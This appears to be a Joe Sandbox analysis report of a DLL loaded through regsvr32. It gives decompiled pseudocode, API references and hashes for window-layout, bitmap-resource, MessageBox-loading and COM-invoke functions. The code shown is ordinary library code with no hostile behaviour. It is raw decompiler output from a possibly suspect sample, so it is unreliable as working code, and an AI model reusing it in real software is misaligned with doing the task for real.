0x1002d466
0x1002d46f
0x1002d471
0x1002d476
0x1002d478
0x1002d478
0x1002d483
0x00000000
0x1002d483
0x1002d45c
0x1002d6eb
0x1002d6eb
0x1002d6f1
0x00000000
0x1002d397

APIs

IsRectEmpty.USER32 ref: 1002D2FA
GetClientRect.USER32 ref: 1002D338
BeginDeferWindowPos.USER32(?), ref: 1002D365
GetWindowRect.USER32 ref: 1002D41B
OffsetRect.USER32(?,?,00000000), ref: 1002D44E
OffsetRect.USER32(?,?,00000000), ref: 1002D483
OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
EqualRect.USER32 ref: 1002D4DD
OffsetRect.USER32(?,00000000,?), ref: 1002D559
OffsetRect.USER32(?,00000000,?), ref: 1002D58E
OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
EqualRect.USER32 ref: 1002D5C0
EndDeferWindowPos.USER32(?), ref: 1002D70D
SetRectEmpty.USER32(?), ref: 1002D717

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
String ID:
API String ID: 3160784657-0
Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B597 Relevance: 21.1, APIs: 14, Instructions: 136
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				void* _t54;
				signed int _t56;
				struct HDC__* _t65;
				struct HBITMAP__* _t66;
				struct HDC__* _t70;
				void* _t78;
				int* _t80;
				int _t81;
				signed int _t84;
				signed int _t89;
				void* _t102;
				struct HDC__* _t103;
				BITMAPINFO* _t105;

				_t53 = LoadResource(_a4, _a8);
				_v20 = _t53;
				if(_t53 == 0) {
					return _t53;
				}
				_t54 = LockResource(_t53);
				_t78 = _t54;
				_v12 = _t78;
				if(_t78 == 0) {
					L17:
					return _t54;
				}
				_t99 =  *_t78 + 0x40;
				_t54 = E100107B6( *_t78 + 0x40);
				_t105 = _t54;
				if(_t105 == 0) {
					L16:
					goto L17;
				} else {
					E10011440(_t105, _t78, _t99);
					_t102 = _t105 + _t105->bmiHeader;
					_a8 = _a8 & 0x00000000;
					do {
						_t84 =  *(_t102 + _a8 * 4);
						_t56 = 0;
						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
							_t56 = _t56 + 1;
							if(_t56 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t80 = 0x1003f064 + _t56 * 8;
							_v8 = _t80;
							_a4 = GetSysColor( *_t80) & 0x000000ff;
							_a4 = GetSysColor( *_t80) << 8;
							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
							__eflags = _t89;
							 *(_t102 + _a8 * 4) = _t89;
						} else {
							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
							if(__eflags != 0) {
								 *(_t102 + _a8 * 4) = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t103 = _t105->bmiHeader.biWidth;
					_t81 = _t105->bmiHeader.biHeight;
					_a4 = _t103;
					_a8 = _t81;
					_t65 = GetDC(0);
					_a12 = _t65;
					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
					_v8 = _t66;
					if(_t66 != 0) {
						_t70 = CreateCompatibleDC(_a12);
						_t81 = SelectObject;
						_t103 = _t70;
						_v16 = SelectObject(_t103, _v8);
						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
						SelectObject(_t103, _v16);
						DeleteDC(_t103);
					}
					ReleaseDC(0, _a12);
					_push(_t105);
					E100107C8(_t81, _t103, _t105, 0);
					FreeResource(_v20);
					_t54 = _v8;
					goto L16;
				}
			}

0x1002b5a3
0x1002b5ab
0x1002b5ae
0x1002b71c
0x1002b71c
0x1002b5b6
0x1002b5bc
0x1002b5c0
0x1002b5c3
0x1002b71a
0x00000000
0x1002b71a
0x1002b5cd
0x1002b5d1
0x1002b5d6
0x1002b5db
0x1002b718
0x00000000
0x1002b5e1
0x1002b5e4
0x1002b5ee
0x1002b5f0
0x1002b5f4
0x1002b5f7
0x1002b5fa
0x1002b5fc
0x1002b605
0x1002b609
0x00000000
0x00000000
0x00000000
0x1002b60b
0x1002b60d
0x1002b611
0x1002b629
0x1002b632
0x1002b640
0x1002b655
0x1002b667
0x1002b667
0x1002b66c
0x1002b613
0x1002b613
0x1002b61b
0x1002b620
0x1002b620
0x1002b61b
0x1002b66f
0x1002b66f
0x1002b672
0x1002b67c
0x1002b67f
0x1002b684
0x1002b687
0x1002b68a
0x1002b693
0x1002b696
0x1002b69e
0x1002b6a1
0x1002b6a6
0x1002b6af
0x1002b6b5
0x1002b6ca
0x1002b6e7
0x1002b6f1
0x1002b6f4
0x1002b6f4
0x1002b6ff
0x1002b705
0x1002b706
0x1002b70f
0x1002b715
0x00000000
0x1002b715

APIs

LoadResource.KERNEL32(?,?), ref: 1002B5A3
LockResource.KERNEL32(00000000), ref: 1002B5B6
GetSysColor.USER32(00000000), ref: 1002B635
GetSysColor.USER32(00000000), ref: 1002B643
GetSysColor.USER32(00000000), ref: 1002B658
GetDC.USER32(00000000), ref: 1002B68A
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
SelectObject.GDI32(00000000,?), ref: 1002B6B8
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
DeleteDC.GDI32(00000000), ref: 1002B6F4
ReleaseDC.USER32 ref: 1002B6FF
FreeResource.KERNEL32(00000000), ref: 1002B70F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
String ID:
API String ID: 2552574679-0
Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60

Uniqueness

Uniqueness Score: -1.00%

Function 10019D1D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1004f824 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1004f830; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1004f828; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1004f82c; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1004f824(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1004f3ec < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1004f824 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1004f3e0 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1004f834 = _t26;
						if(_t26 != 0) {
							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}

0x10019d24
0x10019d26
0x10019d2e
0x10019d9d
0x10019d9d
0x10019da4
0x10019de2
0x10019de2
0x10019de9
0x10019ded
0x10019df1
0x10019df3
0x10019dfa
0x10019dff
0x10019dff
0x10019dfa
0x10019df1
0x10019e01
0x00000000
0x10019e0b
0x10019da6
0x10019daa
0x10019dc9
0x10019dd0
0x10019ddc
0x10019dd2
0x10019dd2
0x10019dd2
0x00000000
0x10019dd0
0x10019daf
0x10019db0
0x10019db5
0x10019db6
0x10019db8
0x10019dc1
0x00000000
0x00000000
0x00000000
0x00000000
0x10019dc1
0x10019d3b
0x10019d3f
0x10019dd8
0x00000000
0x10019dd8
0x10019d51
0x10019d55
0x10019d5a
0x00000000
0x10019d5c
0x10019d6a
0x10019d78
0x10019d7d
0x10019d85
0x10019d89
0x10019d8e
0x10019d98
0x10019d98
0x10019d8e
0x00000000
0x10019d7d

APIs

LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96

Strings

GetUserObjectInformationA, xrefs: 10019D7F
user32.dll, xrefs: 10019D30
MessageBoxA, xrefs: 10019D4B
GetProcessWindowStation, xrefs: 10019D90
GetActiveWindow, xrefs: 10019D5C
GetLastActivePopup, xrefs: 10019D64

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 10039B26 Relevance: 19.9, APIs: 13, Instructions: 395
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10039B26(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011BF0(0x1003b377, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10011C50(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F77E(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E100067FA(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001CE3B(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E10010592(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10011C50(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x10043018, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F7A9(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F77E(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(__eflags == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10039A54(_t178, __eflags);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E1000860E(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E1000860E(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E1000860E(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E10011C0F(_t247 + 0x14, 0x100483f4);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E100387D9(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1003A037))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1003702D(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}

0x10039b2b
0x10039b30
0x10039b38
0x10039b3b
0x10039b41
0x10039b45
0x10039b48
0x10039b55
0x10039b5a
0x10039b5d
0x10039b62
0x10039b70
0x10039b64
0x10039b65
0x10039b6b
0x10039b6b
0x10039b77
0x10039b7e
0x10039b83
0x10039b8a
0x10039b8a
0x10039b8f
0x10039b9e
0x10039ba9
0x10039bac
0x10039bb7
0x10039bbd
0x10039bc1
0x10039bc4
0x10039bc7
0x10039bcd
0x10039bd0
0x10039bd3
0x10039bd3
0x10039bdb
0x10039bde
0x10039be1
0x10039be2
0x10039be5
0x10039beb
0x10039bee
0x10039bf1
0x10039bfb
0x10039bfb
0x10039bfe
0x10039c06
0x10039c08
0x10039d38
0x10039d3d
0x10039d40
0x10039d42
0x00000000
0x00000000
0x00000000
0x10039d49
0x10039d4c
0x10039d4e
0x10039d54
0x10039d5c
0x00000000
0x00000000
0x00000000
0x00000000
0x10039d42
0x10039c0e
0x10039c0e
0x10039d60
0x10039d60
0x10039d63
0x10039d63
0x10039d65
0x10039d67
0x10039d67
0x10039c14
0x10039c15
0x10039c19
0x10039c1f
0x00000000
0x10039c26
0x10039c29
0x10039c2b
0x00000000
0x00000000
0x00000000
0x00000000
0x10039c54
0x10039c58
0x10039c5d
0x10039c60
0x00000000
0x00000000
0x10039c67
0x10039c6b
0x10039c70
0x10039c73
0x00000000
0x00000000
0x10039c7a
0x10039c7d
0x10039c7d
0x10039c7f
0x10039c81
0x00000000
0x00000000
0x10039c90
0x10039c93
0x10039c95
0x10039c97
0x10039c98
0x10039c9b
0x10039ca1
0x10039ca5
0x10039ca7
0x10039cad
0x10039caf
0x00000000
0x00000000
0x10039caf
0x00000000
0x00000000
0x10039d10
0x10039d13
0x10039d17
0x10039d19
0x10039c2e
0x10039c2e
0x00000000
0x00000000
0x10039d20
0x10039d24
0x10039d27
0x10039d2a
0x10039d2c
0x10039d2d
0x10039d2e
0x10039d2f
0x10039d30
0x10039d33
0x10039d35
0x00000000
0x00000000
0x10039cba
0x10039cba
0x10039cbd
0x10039cbf
0x10039cc1
0x10039cc3
0x10039cc6
0x10039ccb
0x10039cd1
0x10039cd2
0x10039cd5
0x10039cd7
0x10039cda
0x10039cda
0x10039ce2
0x10039cee
0x10039cee
0x10039cf3
0x10039cf4
0x10039cfa
0x10039cfe
0x10039d00
0x10039d02
0x10039d04
0x10039cb5
0x10039cb5
0x00000000
0x10039cb5
0x10039d04
0x10039d06
0x10039d09
0x00000000
0x00000000
0x00000000
0x00000000
0x10039c46
0x10039c49
0x10039c4d
0x00000000
0x00000000
0x10039c36
0x10039c39
0x10039c3c
0x10039c3e
0x10039c41
0x10039c83
0x10039c83
0x10039c88
0x00000000
0x00000000
0x10039c1f
0x10039c19
0x10039c0e
0x10039d69
0x10039d69
0x10039d6d
0x10039d70
0x10039d79
0x10039d79
0x10039d82
0x10039d85
0x10039d85
0x10039bc7
0x10039d8b
0x10039d8d
0x10039d96
0x10039d98
0x10039d98
0x10039da2
0x10039daa
0x10039dac
0x10039dd2
0x10039dd5
0x10039dda
0x10039de5
0x10039de9
0x10039deb
0x10039ded
0x10039ded
0x10039df1
0x10039df8
0x10039df8
0x10039dfe
0x10039e01
0x10039e02
0x10039e02
0x10039ded
0x10039deb
0x10039e07
0x10039e0a
0x10039e14
0x10039e15
0x10039ecc
0x10039ecc
0x10039ecf
0x10039ed2
0x10039ed8
0x10039edc
0x10039ee0
0x10039ee5
0x10039eeb
0x10039eed
0x10039eef
0x10039ef5
0x10039efb
0x00000000
0x10039efb
0x10039eef
0x00000000
